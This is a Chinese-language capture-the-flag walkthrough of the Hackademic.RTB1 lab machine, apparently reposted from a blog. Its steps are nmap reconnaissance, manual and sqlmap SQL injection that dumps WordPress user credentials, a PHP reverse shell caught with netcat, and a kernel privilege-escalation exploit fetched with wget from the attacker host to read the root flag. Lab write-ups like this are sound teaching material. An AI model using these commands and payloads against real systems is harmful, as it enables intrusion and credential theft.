靶机介绍:

1)靶机名称:2-Free-Hackademic.RTB1

2)靶机链接:

步骤:链接:https://pan.baidu.com/s/1IMWhKd3h8sDcPelzXXhxKg 提取码:o5k0

打靶过程:

1)启动靶机,选择网络模式为仅主机模式,由此可确定靶机地址段为192.168.56.0/24

2)通过nmap进行扫描,扫描192.168.56.0/24存活主机

#nmap -sP 192.168.56.0/24

通过扫描,确认靶机地址为192.168.56.104

3)使用nmap扫描该IP开放的所有端口

#nmap -p- 192.168.56.104

扫描发现,开放80端口

4)对每80端口进行工作服务的指纹扫描(应用服务版本信息等)

#nmap -p80 -sV -sC 192.168.56.104

5)访问web页面

http://192.168.56.104/

6)点击标题“Hackademic_RTB1”,出现如下页面

7)点击Got root,发现地址栏参数发生变化,http://192.168.56.104/Hackademic_RTB1/?p=9

8)对该URL进行SQL注入测试,判断是否存在SQL注入漏洞

http://192.168.56.104/Hackademic_RTB1/?p=9
http://192.168.56.104/Hackademic_RTB1/?p=9'

页面无明显变化,说明此处无SQL注入漏洞

9)点击上述页面最下方的“Uncategorized”发现,URL中的参数发生了变化

10)对上述URL进行SQL注入测试,页面发生了变化,说明存在SQL注入漏洞

http://192.168.56.104/Hackademic_RTB1/?cat=1
http://192.168.56.104/Hackademic_RTB1/?cat=1'

11)手动测试

http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 6
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,2,3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,databases(),3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='wp_users'

12)SQLmap自动注入

①检测数据库类型,证明是否存在sql注入漏洞

# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --batch

②获取数据库

# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  --dbs --batch

③获取wordpress数据库中的数据表

#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" --tables --batch

④获取wp_users表中的所有字段

#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" -T "wp_users" --columns --batch

⑤获取user_login和user_pass中的数据

#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" -T "wp_users" -C user_login,user_pass --dump --batch

13)最后一个用户JohnSmith的user_pass通过md5进行了加密,可以对其进行破解

https://md5.gromweb.com/

14)通过dirserach对网站目录进行扫描,查看是否可以扫描出web站点的后台管理页面

# dirsearch -u "http://192.168.56.104"
# dirsearch -u "http://192.168.56.104/Hackademic_RTB1/"

15)通过访问扫描出的目录,发现了web站点后台地址

http://192.168.56.104/Hackademic_RTB1/wp-admin/

16)通过SQL注入出来的用户“GeorgeMiller”登入后台后,配置其可以上传的文件类型有php,并点击更新配置

17)上一步配置完成,后生成一个upload选线,运行上传PHP文件

18)下载PHP反弹shell脚本文件,并在upLoad页面进行上传

#php反弹shell脚本文件下载地址

php-reverse-shell

下载完成后,设置脚本中IP地址为kali主机地址(192.168.56.103)

上传成功后,返回如下页面及地址:href=’/Hackademic_RTB1/wp-content/reverse.php

19)在Kali主机通过nc监听脚本中设置的端口(1234),并在浏览器访问刚才上传的php脚本文件

#nc -lvvp 1234
浏览器访问:http://192.168.56.104/Hackademic_RTB1/wp-content/reverse.php

此时已经成功反弹shell

20)查看当前用户是否具有sudo权限,提示必须要有一个控制终端

$sudo -s

21)查看当前主机内核为2.6.31

$uname -a

22)在kali主机搜索2.6.31内核对应的本地权限提示脚本

#searchsploit 2.6.3|grep -i "local privilege escalation"

23)将选定的提权脚本复制到Kali本机站点目录下,并启动httpd服务

# cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html
# systemctl restart apache2

24)在反弹shell成功后的主机,将上述脚本下载下来

$ cd /tmp
$ wget http://192.168.56.103/15285.c

25)通过gcc编译

$ gcc -o exp 15285.c
$ ls
$ chmod +x exp

26)获取flag

#cd /root
#ls
#cat key.txt

原文地址:http://www.cnblogs.com/piaolaipiaoqu/p/16920606.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性